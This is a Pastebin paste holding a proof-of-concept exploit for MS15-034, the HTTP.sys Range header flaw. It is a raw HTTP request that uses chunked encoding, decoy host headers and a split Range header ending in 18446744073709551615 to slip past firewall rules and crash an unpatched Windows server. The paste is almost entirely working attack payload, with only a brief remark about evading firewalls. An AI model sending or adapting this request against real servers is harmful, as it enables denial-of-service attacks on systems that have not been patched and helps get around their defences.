API tools faq
paste
Advertisement
Guest User

MS15-034 PoC by @irsdl to bypass firewall rules

a guest
Apr 17th, 2015
913
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
raw download clone embed print report
  1. MS15-034 PoC by @irsdl to bypass firewall rules
  2. This is only one HTTP request!
  3. ======================
  4. GET /ws8-brand.png HTTP/1.1
  5. Host: 192.168.124.129
  6. Content-Length: 624
  7. Range: bytes = 2 - 5
  8. Transfer-Encoding: chunked
  9. Content-type: application/x-www-form-urlencoded
  10.  
  11. 1;MS15-034_PoC_by_IRSDL_Use_non-text_mime-types_such_as_PNG_or_ICO_files_for_BSOD
  12. 1
  13. 0
  14. Dummy: This PoC is to evade some firewall rules when the server has not been patched yet.
  15.  
  16. POST https://TrustedHostWillBeIgnored.com/ws8-brand.png HTTP/1.1
  17. Host: TrustedHostWillBeIgnored.com
  18. Content-Length: 0
  19. Transfer-Encoding: chunked
  20.  
  21. 2;some_dummy_data_here_-_will_be_ignored
  22. 11
  23. 0
  24. foobar: some dummy data here - will be ignored
  25.  
  26. GET https://TrustedHostWillBeIgnored.com/ws8-brand.png HTTP/1.1
  27. Host: TrustedHostWillBeIgnored.com
  28. Content-Length: 0
  29. Range:
  30. bytes
  31. =
  32. 2
  33. -
  34. 18446744073709551615
  35.  
  36. dummy dummy!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!